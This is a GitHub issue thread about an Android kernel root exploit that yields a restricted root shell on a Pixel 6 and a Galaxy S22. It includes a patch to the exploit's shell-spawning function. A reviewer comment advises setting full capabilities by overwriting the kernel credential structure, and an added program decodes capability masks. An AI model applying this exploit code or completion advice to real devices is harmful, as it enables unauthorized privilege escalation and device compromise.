ls: .: Permission denied #4

Open
stevejubs opened this issue Mar 18, 2024 · 3 comments
Comments

stevejubs commented Mar 18, 2024

Thank you for the exploit. However, the root shell returns 'Permission denied' on Pixel 6. I need to know the root cause of the problem.

[screenshot attached]

ye4ah4 commented Apr 28, 2024

Hi,
I encountered the same issue on the Samsung S22 and also failed to find the root cause or a solution.
[screenshot attached]


ye4ah4 commented Apr 28, 2024

Hi,

I used a root shell obtained with Magisk to check the process capabilities:
r0q:/ # cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000

But with the root shell obtained using the exploit, the process capabilities are:
r0q:/data/local/tmp # cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 00000000000000c0
CapEff: 00000000000000c0
CapBnd: 00000000000000c0
CapAmb: 0000000000000000

Could this be the reason? Thank you. I am attempting to modify the capabilities of the exploit to be similar to Magisk's capabilities, but I am not very familiar with the code, and I haven't succeeded in making the changes yet.

Best Wishes


ye4ah4 commented Apr 28, 2024

I tried to modify the cap as follows, but it failed, saying that the permissions were insufficient.

--- a/exp_s22.c
+++ b/exp_s22.c
@@ -38,6 +38,7 @@
#include <sys/socket.h>
+#include <sys/capability.h>

#define MAX_PIPE_NUM 0x400
#define MAX_256_PIPE 0x400

void exploit(void) {
setuid(0);
seteuid(0);

  • struct __user_cap_header_struct hdr;

  • struct __user_cap_data_struct ucdata;

  • hdr.version = _LINUX_CAPABILITY_VERSION; //setcaps

  • hdr.pid = getpid();

  • ucdata.effective = ((1 << CAP_SYS_NICE) | (1 << CAP_SETUID) | (1 << CAP_SETGID));

  • ucdata.permitted = ((1 << CAP_SYS_NICE) | (1 << CAP_SETUID) | (1 << CAP_SETGID));

  • ucdata.inheritable = 0xffffffff;

  • if (-1 == capset(&hdr, &ucdata)) {

  • printf("cap strerror(errno) %s\n",strerror(errno));

  • }

    printf("cap now uid/gid: %d/%d\n", getuid(), getgid());
    system("/system/bin/sh");
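Review bot: the capset() added in exploit() cannot succeed from this cred, so the EPERM is the expected result rather than a bug in how the call is made. cap_capset() in security/commoncap.c only lets a process shrink its permitted set, and requires the new inheritable set to stay within old inheritable|permitted (old inheritable|bounding with CAP_SETPCAP). With CapPrm and CapBnd both at 0x00c0 (CAP_SETGID bit 6 | CAP_SETUID bit 7), `ucdata.permitted = ((1 << CAP_SYS_NICE) | ...)` asks to add bit 23 and `ucdata.inheritable = 0xffffffff` asks for bits outside the bounding set; either alone returns EPERM regardless of uid 0, and CAP_SETPCAP would not change that. If the goal is the Magisk-style 0x1ffffffffff mask, the cap_permitted, cap_effective, cap_bset and cap_inheritable fields of the struct cred have to be written by the same primitive that already sets the uid fields (the "cred is overwritten" step), not raised afterwards from userland. Two smaller points: _LINUX_CAPABILITY_VERSION is the deprecated 32-bit v1 format, so a single __user_cap_data_struct cannot express capabilities above 31 even for a caller that is allowed to set them (use _LINUX_CAPABILITY_VERSION_3 with a two-element array); and because the failure is only printed, exploit() continues into `system("/system/bin/sh")` with the old capabilities, so returning early or re-reading /proc/self/status before spawning the shell would make the state explicit.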

when exp
cred is overwritten
cap strerror(errno) Operation not permitted
cap now uid/gid: 0/0
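The capability comparison two comments up and the failed capset() patch above can both be reproduced offline. The program below is an added example for this thread, not code from the exploit repository or from either commenter: it embeds the two /proc/self/status excerpts posted above as constructed strings (values copied from the thread), decodes each mask by capability number using the numbering from <linux/capability.h>, and applies the checks cap_capset() in security/commoncap.c uses to accept or reject a capset(2) request. What it makes visible is that 0xc0 is exactly CAP_SETGID|CAP_SETUID, that CAP_DAC_OVERRIDE and CAP_DAC_READ_SEARCH are not in it, and that the patch's request must return EPERM. Whether the ls denial on the Pixel 6 and S22 is a DAC check or an SELinux denial is not shown anywhere in the thread, so that remains the thing to confirm on the device.

```c
/* cap_check.c: decode CapPrm/CapEff/CapBnd masks from a /proc/<pid>/status
 * dump and model the kernel's capset(2) acceptance rules (cap_capset() in
 * security/commoncap.c). Added example for this thread, not code from the
 * exploit repository. The two status excerpts are constructed from the values
 * posted in the thread; capability numbers follow <linux/capability.h>.
 * Build: cc -std=c99 -Wall -o cap_check cap_check.c && ./cap_check
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CAP_COUNT 41                        /* CAP_LAST_CAP is 40 (CAP_CHECKPOINT_RESTORE) */
#define CAP_FULL  ((1ULL << CAP_COUNT) - 1) /* 0x1ffffffffff, the mask the Magisk shell shows */
#define CAP_BIT(n) (1ULL << (n))
#define DAC_OVERRIDE_BIT    CAP_BIT(1)
#define DAC_READ_SEARCH_BIT CAP_BIT(2)
#define SETGID_BIT          CAP_BIT(6)
#define SETUID_BIT          CAP_BIT(7)
#define SYS_NICE_BIT        CAP_BIT(23)

static const char *cap_names[CAP_COUNT] = {
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore"
};

/* Constructed status excerpts; the hex values are the ones pasted in the thread. */
static const char *EXPLOIT_SHELL_STATUS =
    "CapInh:\t0000000000000000\nCapPrm:\t00000000000000c0\nCapEff:\t00000000000000c0\n"
    "CapBnd:\t00000000000000c0\nCapAmb:\t0000000000000000\n";
static const char *MAGISK_SHELL_STATUS =
    "CapInh:\t0000000000000000\nCapPrm:\t000001ffffffffff\nCapEff:\t000001ffffffffff\n"
    "CapBnd:\t000001ffffffffff\nCapAmb:\t0000000000000000\n";

/* Read the hex mask after a field label such as "CapEff:". Returns 0 on success, -1 if absent. */
int parse_cap_field(const char *status, const char *field, uint64_t *out) {
    const char *p = strstr(status, field);
    unsigned long long v;
    if (!p) return -1;
    p += strlen(field);
    while (*p == ' ' || *p == '\t') p++;
    if (sscanf(p, "%llx", &v) != 1) return -1;
    *out = (uint64_t)v;
    return 0;
}

/* Write the set bits of mask as "name,name,..." into buf; returns the number of bits named. */
int describe_caps(uint64_t mask, char *buf, size_t n) {
    int count = 0;
    size_t used = 0;
    buf[0] = '\0';
    for (int bit = 0; bit < CAP_COUNT; bit++) {
        if (!(mask & CAP_BIT(bit))) continue;
        int w = snprintf(buf + used, n - used, "%s%s", count ? "," : "", cap_names[bit]);
        if (w < 0 || (size_t)w >= n - used) break;   /* out of room: stop, buf stays terminated */
        used += (size_t)w;
        count++;
    }
    return count;
}

/* The checks cap_capset() applies, in order. Returns 0 if the kernel would accept
 * the request, -1 where it returns -EPERM. has_setpcap relaxes only the first check. */
int capset_allowed(uint64_t old_inh, uint64_t old_prm, uint64_t bset, int has_setpcap,
                   uint64_t new_eff, uint64_t new_inh, uint64_t new_prm) {
    if (!has_setpcap && (new_inh & ~(old_inh | old_prm))) return -1; /* pI limited to old pI|pP */
    if (new_inh & ~(old_inh | bset)) return -1;                      /* pI never outside bounding */
    if (new_prm & ~old_prm) return -1;                               /* pP can only shrink */
    if (new_eff & ~new_prm) return -1;                               /* pE must fit new pP */
    return 0;
}

int main(void) {
    uint64_t inh = 0, prm = 0, eff = 0, bnd = 0;
    char names[512];
    parse_cap_field(EXPLOIT_SHELL_STATUS, "CapInh:", &inh);
    parse_cap_field(EXPLOIT_SHELL_STATUS, "CapPrm:", &prm);
    parse_cap_field(EXPLOIT_SHELL_STATUS, "CapEff:", &eff);
    parse_cap_field(EXPLOIT_SHELL_STATUS, "CapBnd:", &bnd);
    describe_caps(eff, names, sizeof names);
    printf("exploit shell CapEff 0x%llx = %s\n", (unsigned long long)eff, names);
    describe_caps((DAC_OVERRIDE_BIT | DAC_READ_SEARCH_BIT) & ~eff, names, sizeof names);
    printf("DAC-bypass caps absent from it: %s\n", names);

    /* The sets the posted patch hands to capset(): v1 header, so 32-bit masks. */
    uint64_t want = SYS_NICE_BIT | SETUID_BIT | SETGID_BIT;
    printf("patch's capset() request: %s\n",
           capset_allowed(inh, prm, bnd, 0, want, 0xffffffffULL, want) ? "EPERM" : "accepted");
    /* Dropping within the current permitted set is what capset() is for. */
    printf("drop to setuid only: %s\n",
           capset_allowed(inh, prm, bnd, 0, SETUID_BIT, 0, SETUID_BIT) ? "EPERM" : "accepted");
    return 0;
}
```

On a device, swapping the constructed strings for the contents of /proc/self/status read from the exploit's shell gives the same decode; the capset model is deliberately the kernel's own four checks and nothing else, so it also answers the question of whether any userland call from the 0xc0 cred could reach the Magisk mask (it cannot, which is why the fix has to land in the overwritten struct cred itself).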
